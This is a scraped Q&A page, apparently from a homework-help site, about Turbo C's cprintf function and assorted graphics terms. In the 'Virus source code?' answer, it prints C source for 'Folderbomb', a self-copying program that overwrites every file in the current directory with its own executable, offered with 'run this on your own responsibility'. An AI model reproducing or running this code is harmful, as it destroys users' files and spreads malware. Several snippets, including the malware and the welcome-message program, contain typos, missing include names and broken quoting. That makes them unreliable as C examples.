answersLogoWhite

0

What is cprintf in graphics?

User Avatar

Anonymous

12y ago
Updated: 8/20/2019

cprintf is to the console, printf to stdout (standard output). The only difference is stdout can be redirected but the console cannot.

User Avatar

Wiki User

12y ago

What else can I help you with?

Related Questions

What is cprintf?

A function in c langage that prints colored text one must use the heather file conio.h to use cprintf :)


What is the difference between cprintf and printf?

The printf function calls on fprintf to write the result of sprintf to standard output. That is:printf("%i\n", 42);is exactly equivalent to:fprintf(stdout, "%i\n", 42);


How do you write a turbo c program that will print on a screen Welcome to CSSAC Sipocot Campus?

#include #include void main (void) { time_t t, newt; int i = 0, x, y; time (&t); clrscr (); cprintf ("Hit any key to continue: "); x = wherex (); y = wherey (); // Wait for a keypress, flashing the message // "I'm waiting!" on and off once per second. // After any key is hit, display "Welcome to CSSAC Sipocot Campus" while (!kbhit ()) { time (&newt); if (t != newt) { t = newt; i++; if (0 == (i & 1)) cprintf ("I\'m waiting!"); clreol (); gotoxy (x, y); } } getch (); cprintf ("\r\n"Welcome to CSSAC Sipocot Campus"\r\n"); }


Is graphics a verb?

No. Graphics is not a verb.


What is meta graphics?

what is meta graphics?


Write Procedure to implement highlight as a blinking operation?

Blinking text in DOS, compiled with Turbo C #include int main() { int color; textattr(128 + 10); cprintf("This is blinking text\n"); return 0; }


Where can you get star graphics?

You can get some star graphics from deviantart.com Also you can get other graphics as well.


Virus source code?

If you're talking about viruses on your computer, No you cannot.Viruses are executables. The code in them is binary code- Machine language. You can't open it and expect to see the C code.There are many kinds of viruses. Anything which is harmful and/or self-propagating can be considered a virus and there are numerous ways on how to write the same program./*this is a simple program to create a virus in cit will create folder in a folder in a folder and so on run this on your own responsibility*/includeincludeincludeincludeincludevoid main(int argc,char* argv[]){ char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf("-------------------------"); printf("\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n"); cprintf("-------------------------"); done = findfirst("*.*",&ffblk,0); while (!done) { printf("\n");cprintf(" %s ", ffblk.ff_name);printf("is attacked by ");cprintf("Folderbomb"); source=open(argv[0],O_RDONLY|O_BINARY); target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0) write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); } getch(); }


What is uma graphics?

Its how the game look, if the game is 3d it has good graphics, but if its 2d it has poor graphics.


What is gmode in computer graphics?

graphics mode , the system sets the mode to graphics from text mode


What VGA stands for?

Video Graphics Adapter


What is mean by gdriver in graphics?

in graphics gdriver means graphics driver. it contains DETECT as an exception.